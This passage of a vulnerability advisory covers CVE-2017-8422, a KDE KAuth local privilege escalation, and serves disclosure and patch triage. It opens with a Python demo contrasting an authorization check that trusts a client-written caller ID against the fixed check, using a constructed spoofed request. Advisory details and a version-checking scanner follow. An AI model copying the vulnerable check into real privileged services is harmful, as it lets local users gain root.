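    body: dict = field(default_factory=dict)   # arguments chosen by the client


def uid_of(unique_name: Optional[str]) -> Optional[int]:
    """Resolve a unique bus name to the uid that owns the connection."""
    return BUS_CONNECTIONS.get(unique_name)


def authorize_vulnerable(msg: Message) -> bool:
    """Pre-fix pattern: trusts a callerID the client wrote into the body.

    The body is client-controlled, so any unique name can be claimed.
    """
    claimed = msg.body.get("callerID")
    return uid_of(claimed) in POLICY.get(msg.action, set())


def authorize_fixed(msg: Message) -> bool:
    """Fixed pattern: identify the caller by the bus-assigned sender only."""
    return uid_of(msg.sender) in POLICY.get(msg.action, set())


def evaluate(msg: Message) -> dict:
    """Run both checks so the difference is visible side by side."""
    return {
        "sender": msg.sender,
        "claimed": msg.body.get("callerID"),
        "vulnerable_allows": authorize_vulnerable(msg),
        "fixed_allows": authorize_fixed(msg),
    }


if __name__ == "__main__":
    # Constructed request: an unprivileged connection claiming the root one.
    spoofed = Message(sender=":1.57", action="org.example.helper.mount",
                      body={"callerID": ":1.0"})
    print(evaluate(spoofed))
```

The hardened variant answers the only question the daemon can vouch for: which connection sent this message, and which uid owns that connection. Any identity the client writes into the payload is just data, and a helper that keys its PolicyKit or policy-table lookup on it has no authentication at all.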

- Vulnerability information

KDE KAuth CVE-2017-8422 Local Privilege Escalation Vulnerability
Bugtraq ID: 98412
Class: Unknown
Remote: No
Local: Yes
Published: 2017-05-10 12:00:00
Updated: 2017-05-19 02:34:00
Credit: Sebastian Krahmer

- Affected versions

Ubuntu Ubuntu Linux 14.04 LTS
SuSE Package Hub for SUSE Linux Enterprise 12
openSUSE Leap 42.2
openSUSE Leap 42.1
KDE kdelibs 4.14.30
KDE kdelibs 4.14
KDE kdelibs 4.13.3
KDE kdelibs 4.13.2
KDE kdelibs 4.13.1
KDE kdelibs 4.13
KDE kdelibs 4.12
KDE kdelibs 4.11.5
KDE kdelibs 4.11.4
KDE kdelibs 4.11.3
KDE kdelibs 4.11.2
KDE kdelibs 4.11.1
KDE kdelibs 4.11
KDE kdelibs 4.10.95
KDE kdelibs 4.10.3
KDE kdelibs 4.10.1
KDE kdelibs 4.10
KDE kdelibs 4.2.4
KDE kdelibs 3.5.10
KDE kdelibs 3.5.5
KDE kdelibs 3.5.4
KDE kdelibs 3.5.2
KDE kdelibs 3.4.3
KDE kdelibs 3.4.2
KDE kdelibs 3.4
KDE kdelibs 3.3.2
KDE kdelibs 3.3.1
KDE kdelibs 3.3
KDE kdelibs 3.2.2
KDE kdelibs 3.2.1
KDE kdelibs 3.2
KDE kdelibs 3.1.5
KDE kdelibs 3.1.4
KDE kdelibs 3.1.3
KDE kdelibs 3.1.2
KDE kdelibs 3.1.1
KDE kdelibs 3.1
KDE kdelibs 3.0
KDE kdelibs 2.1.2
KDE kdelibs 2.1.1
KDE kdelibs 2.1
KDE kdelibs 2.0.1
KDE kdelibs 2.0
KDE kdelibs 4.6.1
KDE kdelibs 4.6
KDE kdelibs 4.14
KDE kdelibs 4.13.97
KDE kdelibs 4.13.95
KDE kdelibs 4.13.90
KDE kdelibs 4.13.80
KDE kdelibs 4.12.97
KDE kdelibs 4.12.95
KDE kdelibs 4.12.90
KDE kdelibs 4.12.80
KDE kdelibs 4.12.5
KDE kdelibs 4.12.4
KDE kdelibs 4.12.3
KDE kdelibs 4.12.2
KDE kdelibs 4.12.1
KDE kdelibs 4.11.97
KDE kdelibs 4.11.95
KDE kdelibs 4.11.90
KDE kdelibs 4.11.80
KDE kdelibs 4.10.97
KDE kdelibs 4.10.2
KDE KAuth 5.30
KDE KAuth 5.1
Fedoraproject Fedora 26
Fedoraproject Fedora 25
Fedoraproject Fedora 24
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64

- Unaffected versions

KDE kdelibs 4.14.32
KDE KAuth 5.34

- Discussion

KDE KAuth is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to gain elevated privileges on the affected system.

KDE KAuth versions prior to 5.34 and KDE Kdelibs versions prior to 4.14.32 are vulnerable.

- Exploit

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

Updates are available. Please see the references or vendor advisory for more information.
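A triage check built from the fixed versions the advisories above list, as an added example (my code, not from any of the vendors): the upstream thresholds (kdelibs 4.14.32, KAuth 5.34) cannot be applied to distribution packages, because Red Hat shipped the fix as kdelibs-4.14.8-6.el7_3 and Ubuntu as kdelibs5-plugins 4:4.13.3-0ubuntu0.5, both carrying upstream version numbers below the fixed release. The comparator is a simplified rpmvercmp-style split into epoch, version and release (not dpkg's exact algorithm; tildes are not handled), and the inventory lines and the pre-fix distribution revisions are constructed.

```python
"""Added example: per-distribution version triage for CVE-2017-8422.

Fixed versions come from the advisories on this page; the comparator is a
simplified rpmvercmp-style algorithm (not dpkg's exact rules), and the
inventory below is constructed sample input, not output from a real host.
"""
import re
from typing import List, Optional, Tuple

# (distribution, package) -> first fixed version, as stated in the advisories.
FIXED = {
    ("ubuntu-14.04", "kdelibs5-plugins"): "4:4.13.3-0ubuntu0.5",   # USN-3286-1
    ("rhel-7", "kdelibs"): "4.14.8-6.el7_3",                       # RHSA-2017:1264
    ("slackware-14.2", "kdelibs"): "4.14.32",                      # SSA:2017-136-02
    ("gentoo", "kde-frameworks/kauth"): "5.29.0-r1",               # GLSA 201706-29
    ("gentoo", "kde-frameworks/kdelibs"): "4.14.32",               # GLSA 201706-29
    ("upstream", "kdelibs"): "4.14.32",                            # KDE advisory
    ("upstream", "kauth"): "5.34",                                 # KDE advisory
}

_TOKEN = re.compile(r"\d+|[A-Za-z]+")


def _split_evr(v: str) -> Tuple[int, str, str]:
    """Split 'epoch:version-release' (epoch and release are optional)."""
    epoch, rest = v.split(":", 1) if ":" in v else ("0", v)
    version, release = rest.rsplit("-", 1) if "-" in rest else (rest, "")
    return int(epoch), version, release


def _cmp_segment(a: str, b: str) -> int:
    """Compare alternating numeric/alphabetic runs the way rpmvercmp does."""
    ta, tb = _TOKEN.findall(a), _TOKEN.findall(b)
    for x, y in zip(ta, tb):
        if x == y:
            continue
        if x.isdigit() and y.isdigit():
            return (int(x) > int(y)) - (int(x) < int(y))
        if x.isdigit():
            return 1    # a numeric run sorts as newer than an alphabetic one
        if y.isdigit():
            return -1
        return (x > y) - (x < y)
    return (len(ta) > len(tb)) - (len(ta) < len(tb))


def compare_versions(a: str, b: str) -> int:
    """Return <0, 0 or >0 as a is older than, equal to or newer than b."""
    ea, va, ra = _split_evr(a)
    eb, vb, rb = _split_evr(b)
    if ea != eb:
        return (ea > eb) - (ea < eb)
    return _cmp_segment(va, vb) or _cmp_segment(ra, rb)


def is_vulnerable(distro: str, package: str, installed: str) -> Optional[bool]:
    """True if installed is older than the fix; None if the pair is not tracked."""
    fixed = FIXED.get((distro, package))
    if fixed is None:
        return None
    return compare_versions(installed, fixed) < 0


def scan(inventory: List[str]) -> List[Tuple[str, str, str, str]]:
    """Inventory lines are 'distro package version'; returns the vulnerable ones."""
    findings = []
    for line in inventory:
        distro, package, version = line.split()
        if is_vulnerable(distro, package, version):
            findings.append((distro, package, version, FIXED[(distro, package)]))
    return findings


# Constructed inventory; the pre-fix distribution revisions are invented.
SAMPLE_INVENTORY = [
    "ubuntu-14.04 kdelibs5-plugins 4:4.13.3-0ubuntu0.4",
    "ubuntu-14.04 kdelibs5-plugins 4:4.13.3-0ubuntu0.5",
    "rhel-7 kdelibs 4.14.8-5.el7_3",
    "rhel-7 kdelibs 4.14.8-6.el7_3",
    "gentoo kde-frameworks/kauth 5.29.0",
    "gentoo kde-frameworks/kauth 5.29.0-r1",
    "upstream kauth 5.33",
    "upstream kdelibs 4.14.32",
]

if __name__ == "__main__":
    for distro, package, version, fixed in scan(SAMPLE_INVENTORY):
        print(f"{distro}: {package} {version} is below fixed {fixed}")
```

Keying the table on (distribution, package) is the whole point: the same kdelibs 4.14.8 string is vulnerable when matched against the upstream threshold and fixed once it carries the 6.el7_3 release, so a scanner that only looks at the upstream number will keep reporting patched RHEL and Ubuntu hosts.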

- Related references